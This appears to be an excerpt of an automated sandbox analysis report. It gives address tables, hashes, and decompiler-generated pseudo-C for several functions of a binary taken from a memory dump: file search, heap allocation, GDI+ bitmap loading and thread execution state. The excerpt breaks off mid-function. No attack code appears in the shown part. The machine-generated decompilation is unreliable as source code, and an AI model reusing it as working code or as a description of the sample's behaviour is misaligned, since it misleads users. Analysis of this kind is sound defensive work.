                            0x009e1a3d
                            0x009e1a3f
                            0x009e1a7a
                            0x009e1a7a
                            0x00000000
                            0x009e1a7a
                            0x009e1a41
                            0x009e1a44
                            0x009e1a4a
                            0x009e1a4c
                            0x009e1a84
                            0x009e1a84
                            0x009e1a86
                            0x009e1a90
                            0x009e1a96
                            0x009e1a99
                            0x009e1a9f
                            0x009e1aa2
                            0x009e1aa9
                            0x009e1ab6
                            0x00000000
                            0x009e1ab6
                            0x009e1aa4
                            0x009e1aa7
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009e1aa7
                            0x009e1a4e
                            0x009e1a50
                            0x00000000
                            0x00000000
                            0x009e1a52
                            0x009e1a55
                            0x00000000
                            0x00000000
                            0x009e1a57
                            0x009e1a5b
                            0x00000000
                            0x00000000
                            0x009e1a60
                            0x009e1a62
                            0x009e1a66
                            0x00000000
                            0x00000000
                            0x009e1a68
                            0x009e1a6c
                            0x00000000
                            0x00000000
                            0x009e1a6e
                            0x009e1a72
                            0x00000000
                            0x00000000
                            0x009e1a74
                            0x009e1a78
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009e1a7d
                            0x009e1a7d
                            0x009e1a7e
                            0x009e1a7e
                            0x00000000
                            0x009e1a82
                            0x009e19c2
                            0x009e19c8
                            0x009e19c9
                            0x009e19cb
                            0x009e19d1
                            0x009e19d7
                            0x009e19df
                            0x009e19e4
                            0x009e19e4
                            0x00000000
                            0x009e19cb
                            0x009e19a5
                            0x00000000

                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: d55d760a0ab3b9ee9a8f46956e7d8d4258130baf55af0c508e9fa92df05f7512
                            • Instruction ID: a04299fd4c629d775aab7fe048eadb86f9185ed0cd6d02d5eefb604412ec88b3
                            • Opcode Fuzzy Hash: d55d760a0ab3b9ee9a8f46956e7d8d4258130baf55af0c508e9fa92df05f7512
                            • Instruction Fuzzy Hash: ABB1E470A006C6AFEB2ACF76C484BB9FBE9BF05304F180259E495C7281D734AD94CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009E81C4, Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                            Download Yara Rule
                            C-Code - Quality: 91%
                            			E009E81C4(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t47;
				signed int _t50;
				signed int _t51;
				void* _t53;
				signed int _t55;
				signed int _t61;
				intOrPtr _t73;
				signed int _t80;
				intOrPtr _t88;
				void* _t89;
				void* _t91;
				intOrPtr _t93;
				void* _t95;
				void* _t98;

				_t98 = __eflags;
				_t90 = __edi;
				_t88 = __edx;
				_t73 = __ecx;
				E009FD870(E00A112D2, _t95);
				E009FD940();
				_t93 = _t73;
				_t1 = _t95 - 0x9d58; // -38232
				E009E137D(_t1, _t88, __edi, _t98,  *(_t93 + 8));
				 *(_t95 - 4) =  *(_t95 - 4) & 0x00000000;
				_t6 = _t95 - 0x9d58; // -38232
				if(E009E9C0E(_t6, _t93 + 0xf4) != 0) {
					_t7 = _t95 - 0x9d58; // -38232, executed
					_t47 = E009E1973(_t7, _t88, 1); // executed
					if(_t47 != 0) {
						__eflags =  *((char*)(_t95 - 0x3093));
						if( *((char*)(_t95 - 0x3093)) == 0) {
							_push(__edi);
							_t91 = 0;
							__eflags =  *(_t95 - 0x30a3);
							if( *(_t95 - 0x30a3) != 0) {
								_t10 = _t95 - 0x9d3a; // -38202
								_t11 = _t95 - 0x1010; // -2064
								_t61 = E009EFAB1(_t11, _t10, 0x800);
								__eflags =  *(_t95 - 0x309e);
								while(1) {
									_t17 = _t95 - 0x1010; // -2064
									E009EB782(_t17, 0x800, (_t61 & 0xffffff00 | __eflags == 0x00000000) & 0x000000ff);
									_t18 = _t95 - 0x2058; // -6232
									E009E6EF9(_t18);
									_push(0);
									_t19 = _t95 - 0x2058; // -6232
									_t20 = _t95 - 0x1010; // -2064
									_t61 = E009EA1B1(_t18, _t88, __eflags, _t20, _t19);
									__eflags = _t61;
									if(_t61 == 0) {
										break;
									}
									_t91 = _t91 +  *((intOrPtr*)(_t95 - 0x1058));
									asm("adc ebx, [ebp-0x1054]");
									__eflags =  *(_t95 - 0x309e);
								}
								 *((intOrPtr*)(_t93 + 0x98)) =  *((intOrPtr*)(_t93 + 0x98)) + _t91;
								asm("adc [esi+0x9c], ebx");
							}
							_t23 = _t95 - 0x9d58; // -38232
							E009E835C(_t93, _t88, _t23);
							_t50 =  *(_t93 + 8);
							_t89 = 0x49;
							_pop(_t90);
							_t80 =  *(_t50 + 0x82f2) & 0x0000ffff;
							__eflags = _t80 - 0x54;
							if(_t80 == 0x54) {
								L11:
								 *((char*)(_t50 + 0x61f9)) = 1;
							} else {
								__eflags = _t80 - _t89;
								if(_t80 == _t89) {
									goto L11;
								}
							}
							_t51 =  *(_t93 + 8);
							__eflags =  *((intOrPtr*)(_t51 + 0x82f2)) - _t89;
							if( *((intOrPtr*)(_t51 + 0x82f2)) != _t89) {
								__eflags =  *((char*)(_t51 + 0x61f9));
								_t32 =  *((char*)(_t51 + 0x61f9)) == 0;
								__eflags =  *((char*)(_t51 + 0x61f9)) == 0;
								E009F0FBD((_t51 & 0xffffff00 | _t32) & 0x000000ff, (_t51 & 0xffffff00 | _t32) & 0x000000ff, _t93 + 0xf4);
							}
							_t33 = _t95 - 0x9d58; // -38232
							E009E1E4F(_t33, _t89);
							do {
								_t34 = _t95 - 0x9d58; // -38232
								_t53 = E009E391A(_t34, _t89);
								_t35 = _t95 - 0xd; // 0x7f3
								_t36 = _t95 - 0x9d58; // -38232
								_t55 = E009E83C0(_t93, _t36, _t53, _t35); // executed
								__eflags = _t55;
							} while (_t55 != 0);
						}
					} else {
						E009E6E03(0xa200e0, 1);
					}
				}
				_t37 = _t95 - 0x9d58; // -38232
				E009E162D(_t37, _t90, _t93);
				 *[fs:0x0] =  *((intOrPtr*)(_t95 - 0xc));
				return 0;
			}


















                            0x009e81c4
                            0x009e81c4
                            0x009e81c4
                            0x009e81c4
                            0x009e81c9
                            0x009e81d3
                            0x009e81d9
                            0x009e81db
                            0x009e81e4
                            0x009e81e9
                            0x009e81f4
                            0x009e8201
                            0x009e8209
                            0x009e820f
                            0x009e8216
                            0x009e8229
                            0x009e8230
                            0x009e8237
                            0x009e823a
                            0x009e823c
                            0x009e8242
                            0x009e8249
                            0x009e8250
                            0x009e8257
                            0x009e825c
                            0x009e8277
                            0x009e8283
                            0x009e828a
                            0x009e828f
                            0x009e8295
                            0x009e829a
                            0x009e829c
                            0x009e82a3
                            0x009e82aa
                            0x009e82af
                            0x009e82b1
                            0x00000000
                            0x00000000
                            0x009e8264
                            0x009e826a
                            0x009e8270
                            0x009e8270
                            0x009e82b3
                            0x009e82b9
                            0x009e82b9
                            0x009e82bf
                            0x009e82c8
                            0x009e82cd
                            0x009e82d2
                            0x009e82d3
                            0x009e82d4
                            0x009e82dc
                            0x009e82df
                            0x009e82e6
                            0x009e82e6
                            0x009e82e1
                            0x009e82e1
                            0x009e82e4
                            0x00000000
                            0x00000000
                            0x009e82e4
                            0x009e82ed
                            0x009e82f0
                            0x009e82f7
                            0x009e82f9
                            0x009e8307
                            0x009e8307
                            0x009e830e
                            0x009e830e
                            0x009e8313
                            0x009e8319
                            0x009e831e
                            0x009e831e
                            0x009e8324
                            0x009e8329
                            0x009e832e
                            0x009e8337
                            0x009e833c
                            0x009e833c
                            0x009e831e
                            0x009e8218
                            0x009e821f
                            0x009e821f
                            0x009e8216
                            0x009e8340
                            0x009e8346
                            0x009e8351
                            0x009e835b

                            APIs
                            • __EH_prolog.LIBCMT ref: 009E81C9
                              • Part of subcall function 009E137D: __EH_prolog.LIBCMT ref: 009E1382
                              • Part of subcall function 009E137D: new.LIBCMT ref: 009E13FA
                              • Part of subcall function 009E1973: __EH_prolog.LIBCMT ref: 009E1978
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: 53259045b20a8c64bb3f7c186a193cfd12ea8dd154971b3dc56cff662e943278
                            • Instruction ID: 63776a36140468668a4fd6d1549be787877af4a8ac7dbace3c7821353701aa7f
                            • Opcode Fuzzy Hash: 53259045b20a8c64bb3f7c186a193cfd12ea8dd154971b3dc56cff662e943278
                            • Instruction Fuzzy Hash: 9841B4719006949ADB26DBA2C855BEBB37CAF90740F0404EAE54D93193DF745EC8DB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009F9EEF, Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                            Download Yara Rule
                            C-Code - Quality: 83%
                            			E009F9EEF(void* __ecx, void* __edx, void* __eflags) {
				void* __edi;
				void* __esi;
				short _t33;
				char _t36;
				void* _t47;
				void* _t50;
				short _t55;
				void* _t57;
				void* _t58;
				short _t60;
				void* _t62;
				intOrPtr _t64;
				void* _t67;

				_t67 = __eflags;
				_t57 = __edx;
				_t47 = __ecx;
				E009FD870(E00A114E1, _t62);
				_push(_t47);
				E009FD940();
				_push(_t60);
				_push(_t58);
				 *((intOrPtr*)(_t62 - 0x10)) = _t64;
				 *((intOrPtr*)(_t62 - 4)) = 0;
				E009E137D(_t62 - 0x7d24, _t57, _t58, _t67, 0); // executed
				 *((char*)(_t62 - 4)) = 1;
				E009E1E9E(_t62 - 0x7d24, _t57, _t62, _t67,  *((intOrPtr*)(_t62 + 0xc)));
				if( *((intOrPtr*)(_t62 - 0x105f)) == 0) {
					 *((intOrPtr*)(_t62 - 0x24)) = 0;
					 *((intOrPtr*)(_t62 - 0x20)) = 0;
					 *((intOrPtr*)(_t62 - 0x1c)) = 0;
					 *((intOrPtr*)(_t62 - 0x18)) = 0;
					 *((char*)(_t62 - 0x14)) = 0;
					 *((char*)(_t62 - 4)) = 2;
					_t50 = _t62 - 0x7d24;
					_t33 = E009E192E(_t57, _t62 - 0x24);
					__eflags = _t33;
					if(_t33 != 0) {
						_t60 =  *((intOrPtr*)(_t62 - 0x20));
						_t58 = _t60 + _t60;
						_push(_t58 + 2);
						_t55 = E00A02B53(_t50);
						 *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x10)))) = _t55;
						__eflags = _t55;
						if(_t55 != 0) {
							__eflags = 0;
							 *((short*)(_t58 + _t55)) = 0;
							E009FEA80(_t55,  *((intOrPtr*)(_t62 - 0x24)), _t58);
						} else {
							_t60 = 0;
						}
						 *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x14)))) = _t60;
					}
					E009E15E3(_t62 - 0x24);
					E009E162D(_t62 - 0x7d24, _t58, _t60); // executed
					_t36 = 1;
				} else {
					E009E162D(_t62 - 0x7d24, _t58, _t60);
					_t36 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t62 - 0xc));
				return _t36;
			}
















                            0x009f9eef
                            0x009f9eef
                            0x009f9eef
                            0x009f9ef4
                            0x009f9ef9
                            0x009f9eff
                            0x009f9f05
                            0x009f9f06
                            0x009f9f09
                            0x009f9f13
                            0x009f9f16
                            0x009f9f24
                            0x009f9f28
                            0x009f9f33
                            0x009f9f44
                            0x009f9f47
                            0x009f9f4a
                            0x009f9f4d
                            0x009f9f50
                            0x009f9f56
                            0x009f9f5b
                            0x009f9f61
                            0x009f9f66
                            0x009f9f68
                            0x009f9f6a
                            0x009f9f6d
                            0x009f9f73
                            0x009f9f7a
                            0x009f9f7f
                            0x009f9f81
                            0x009f9f83
                            0x009f9f89
                            0x009f9f8c
                            0x009f9f94
                            0x009f9f85
                            0x009f9f85
                            0x009f9f85
                            0x009f9f9f
                            0x009f9f9f
                            0x009f9fa4
                            0x009f9faf
                            0x009f9fb4
                            0x009f9f35
                            0x009f9f3b
                            0x009f9f40
                            0x009f9f40
                            0x009f9fbb
                            0x009f9fc6

                            APIs
                            • __EH_prolog.LIBCMT ref: 009F9EF4
                              • Part of subcall function 009E137D: __EH_prolog.LIBCMT ref: 009E1382
                              • Part of subcall function 009E137D: new.LIBCMT ref: 009E13FA
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: 16d33aac0215d0da5eff8117d34b0d1e671ea0382a65a3ad055efde6aed1e18f
                            • Instruction ID: 7661644ae17426b194bcfdc19804b576de1bd5e7b5c8143ffabace564cb4bacd
                            • Opcode Fuzzy Hash: 16d33aac0215d0da5eff8117d34b0d1e671ea0382a65a3ad055efde6aed1e18f
                            • Instruction Fuzzy Hash: FD217A71D0428D9ACF15DFA9D981AFEBBF4AF99300F1004EAE909A7202D7356E05DB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A07A8A, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 94%
                            			E00A07A8A(void* __ecx, long _a4) {
				void* __esi;
				void* _t4;
				void* _t6;
				void* _t7;
				void* _t8;
				long _t9;

				_t7 = __ecx;
				_t9 = _a4;
				if(_t9 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00A07ECC())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t9 == 0) {
					_t9 = _t9 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0xa40874, 0, _t9); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00A07906();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E00A06763(_t7, _t8, _t9, __eflags, _t9);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}









                            0x00a07a8a
                            0x00a07a90
                            0x00a07a96
                            0x00a07ac8
                            0x00a07acd
                            0x00a07ad3
                            0x00000000
                            0x00a07ad3
                            0x00a07a9a
                            0x00a07a9c
                            0x00a07a9c
                            0x00a07ab3
                            0x00a07abc
                            0x00a07ac4
                            0x00000000
                            0x00000000
                            0x00a07aa4
                            0x00a07aa6
                            0x00000000
                            0x00000000
                            0x00a07aa9
                            0x00a07aae
                            0x00a07aaf
                            0x00a07ab1
                            0x00000000
                            0x00000000
                            0x00a07ab1
                            0x00000000

                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,?,?,?,00A02FA6,?,0000015D,?,?,?,?,00A04482,000000FF,00000000,?,?), ref: 00A07ABC
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: 2acc7e9cb81d8645d866b9044f502ad22295a2ffbe56044d4d5b34520175fde6
                            • Instruction ID: 5ffadd59d9df1e65952049e75820cc4960bd05e881ce356688a50e71de6bfec3
                            • Opcode Fuzzy Hash: 2acc7e9cb81d8645d866b9044f502ad22295a2ffbe56044d4d5b34520175fde6
                            • Instruction Fuzzy Hash: E2E0ED35F0822E6AEA2267A1BE00B9E3A48EB413F0F190120EC14960D1CB30FE1182E1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009E5A1D, Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                            Download Yara Rule
                            C-Code - Quality: 94%
                            			E009E5A1D(intOrPtr __ecx, void* __eflags) {
				intOrPtr _t25;
				intOrPtr _t34;
				void* _t36;

				_t25 = __ecx;
				E009FD870(E00A11216, _t36);
				_push(_t25);
				_t34 = _t25;
				 *((intOrPtr*)(_t36 - 0x10)) = _t34;
				E009EAD1B(_t25); // executed
				_t2 = _t36 - 4;
				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
				E009EFAE6();
				 *(_t36 - 4) = 1;
				E009EFAE6();
				 *(_t36 - 4) = 2;
				E009EFAE6();
				 *(_t36 - 4) = 3;
				E009EFAE6();
				 *(_t36 - 4) = 4;
				E009EFAE6();
				 *(_t36 - 4) = 5;
				E009E5C12(_t34,  *_t2);
				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
				return _t34;
			}






                            0x009e5a1d
                            0x009e5a22
                            0x009e5a27
                            0x009e5a29
                            0x009e5a2b
                            0x009e5a2e
                            0x009e5a33
                            0x009e5a33
                            0x009e5a3d
                            0x009e5a48
                            0x009e5a4c
                            0x009e5a57
                            0x009e5a5b
                            0x009e5a66
                            0x009e5a6a
                            0x009e5a75
                            0x009e5a79
                            0x009e5a80
                            0x009e5a84
                            0x009e5a8f
                            0x009e5a99

                            APIs
                            • __EH_prolog.LIBCMT ref: 009E5A22
                              • Part of subcall function 009EAD1B: __EH_prolog.LIBCMT ref: 009EAD20
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: 5b0cddc27613422c8ed584ff0ca4f6d2d521c6fc8da13a9b8641d5312c1a2725
                            • Instruction ID: e7671c31ab5ef4ec856165f4e9da2f35e49575daa0b20bfc50c80bfa9ba0200b
                            • Opcode Fuzzy Hash: 5b0cddc27613422c8ed584ff0ca4f6d2d521c6fc8da13a9b8641d5312c1a2725
                            • Instruction Fuzzy Hash: 16018130919684DAD716E7E4C2253EEB7A49F65314F0005AEE45D53382DBB82F44D763
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009E94DA, Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                            Download Yara Rule
                            C-Code - Quality: 89%
                            			E009E94DA(void* __ecx) {
				void* _t16;
				void* _t21;

				_t21 = __ecx;
				_t16 = 1;
				if( *(__ecx + 4) != 0xffffffff) {
					if( *((char*)(__ecx + 0x10)) == 0 &&  *((intOrPtr*)(__ecx + 0xc)) == 0) {
						_t5 = FindCloseChangeNotification( *(__ecx + 4)) - 1; // -1
						asm("sbb bl, bl");
						_t16 =  ~_t5 + 1;
					}
					 *(_t21 + 4) =  *(_t21 + 4) | 0xffffffff;
				}
				 *(_t21 + 0xc) =  *(_t21 + 0xc) & 0x00000000;
				if(_t16 == 0 &&  *((intOrPtr*)(_t21 + 0x14)) != _t16) {
					E009E6C7B(0xa200e0, _t21 + 0x1e);
				}
				return _t16;
			}





                            0x009e94dc
                            0x009e94de
                            0x009e94e4
                            0x009e94ea
                            0x009e94fb
                            0x009e9500
                            0x009e9502
                            0x009e9502
                            0x009e9504
                            0x009e9504
                            0x009e9508
                            0x009e950e
                            0x009e951e
                            0x009e951e
                            0x009e9527

                            APIs
                            • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,009E94AA), ref: 009E94F5
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ChangeCloseFindNotification
                            • String ID:
                            • API String ID: 2591292051-0
                            • Opcode ID: 0b4efa0d9fe7b769d66bf1319e4f7874b4990d5334d2287dc6db9482aa353831
                            • Instruction ID: 795081a92fdf177979e1ddfaeb28dd4e8d62998390a43fc4773ced476505ee6b
                            • Opcode Fuzzy Hash: 0b4efa0d9fe7b769d66bf1319e4f7874b4990d5334d2287dc6db9482aa353831
                            • Instruction Fuzzy Hash: D6F0BE70442B808EEB328B25D508B92B3E89B12730F048B1EE8E6435E0DB71AC4D8B00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009EA1B1, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                            Download Yara Rule
                            C-Code - Quality: 58%
                            			E009EA1B1(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void* _t12;
				intOrPtr _t20;

				_t20 = _a8;
				 *((char*)(_t20 + 0x1044)) = 0;
				if(E009EB5E5(_a4) == 0) {
					_t12 = E009EA2DF(__edx, 0xffffffff, _a4, _t20);
					if(_t12 == 0xffffffff) {
						goto L1;
					}
					FindClose(_t12); // executed
					 *(_t20 + 0x1040) =  *(_t20 + 0x1040) & 0x00000000;
					 *((char*)(_t20 + 0x100c)) = E009E9ECD( *((intOrPtr*)(_t20 + 0x1008)));
					 *((char*)(_t20 + 0x100d)) = E009E9EE5( *((intOrPtr*)(_t20 + 0x1008)));
					return 1;
				}
				L1:
				return 0;
			}





                            0x009ea1b2
                            0x009ea1ba
                            0x009ea1c8
                            0x009ea1d5
                            0x009ea1dd
                            0x00000000
                            0x00000000
                            0x009ea1e0
                            0x009ea1ec
                            0x009ea1fe
                            0x009ea209
                            0x00000000
                            0x009ea20f
                            0x009ea1ca
                            0x00000000

                            APIs
                            • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 009EA1E0
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: CloseFind
                            • String ID:
                            • API String ID: 1863332320-0
                            • Opcode ID: 8df312bbdf2e8779dbec12a190826fc04d703a8064e63cefa15d3290dfe512ae
                            • Instruction ID: 8d871d38ccd7efffedb007209f782898bce5f8ad82abbcf05b4c676468df039a
                            • Opcode Fuzzy Hash: 8df312bbdf2e8779dbec12a190826fc04d703a8064e63cefa15d3290dfe512ae
                            • Instruction Fuzzy Hash: 59F089310087C0AACE239BB548447C77B956F55331F048E4DF1FD121A2C6756895D722
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009F02E8, Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                            Download Yara Rule
                            C-Code - Quality: 75%
                            			E009F02E8() {
				void* __esi;
				void* _t2;

				E009F0FAF(); // executed
				_t2 = E009F0FB4();
				if(_t2 != 0) {
					_t2 = E009E6CC9(_t2, 0xa200e0, 0xff, 0xff);
				}
				if( *0xa200eb != 0) {
					_t2 = E009E6CC9(_t2, 0xa200e0, 0xff, 0xff);
				}
				__imp__SetThreadExecutionState(1);
				return _t2;
			}





                            0x009f02ea
                            0x009f02ef
                            0x009f0300
                            0x009f0305
                            0x009f0305
                            0x009f0311
                            0x009f0316
                            0x009f0316
                            0x009f031d
                            0x009f0325

                            APIs
                            • SetThreadExecutionState.KERNEL32 ref: 009F031D
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ExecutionStateThread
                            • String ID:
                            • API String ID: 2211380416-0
                            • Opcode ID: df810bac49d03f73671f8c3cda321db600dc0e804c7f106cc2ab9d9aab4ed705
                            • Instruction ID: 202e6df6ff00b01153560f4f5f0411c2c05cde0783addf46d7344c872740828e
                            • Opcode Fuzzy Hash: df810bac49d03f73671f8c3cda321db600dc0e804c7f106cc2ab9d9aab4ed705
                            • Instruction Fuzzy Hash: E0D02B1170419452EA2273683805BFE171E4FC5360F080039F389263C3CA850C8BC3A3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009F95CF, Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 68%
                            			E009F95CF(signed int __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t6;

				_push(__ecx);
				_push(0x10);
				L009FD7F6();
				_v8 = __eax;
				if(__eax == 0) {
					return 0;
				}
				_t6 = E009F938E(__eax, _a4, _a8); // executed
				return _t6;
			}





                            0x009f95d2
                            0x009f95d3
                            0x009f95d5
                            0x009f95da
                            0x009f95df
                            0x00000000
                            0x009f95f0
                            0x009f95e9
                            0x00000000

                            APIs
                            • GdipAlloc.GDIPLUS(00000010), ref: 009F95D5
                              • Part of subcall function 009F938E: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 009F93AF
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Gdip$AllocBitmapCreateFromStream
                            • String ID:
                            • API String ID: 1915507550-0
                            • Opcode ID: c2a80f1359858ca97af3cccb572868f2337aa7eea0f8eb62410b7628bddc2cae
                            • Instruction ID: 92394b6ac7675c1a985d86cf17707397cfcb222a7d9d04a218d2a3f466dda200
                            • Opcode Fuzzy Hash: c2a80f1359858ca97af3cccb572868f2337aa7eea0f8eb62410b7628bddc2cae
                            • Instruction Fuzzy Hash: 22D0A77021420D7BDF52BA748C02F7E7B9DDB41310F004025BE04C5141FD71DD20A791
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009E9745, Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E009E9745(void* __ecx) {
				long _t3;

				if( *(__ecx + 4) != 0xffffffff) {
					_t3 = GetFileType( *(__ecx + 4)); // executed
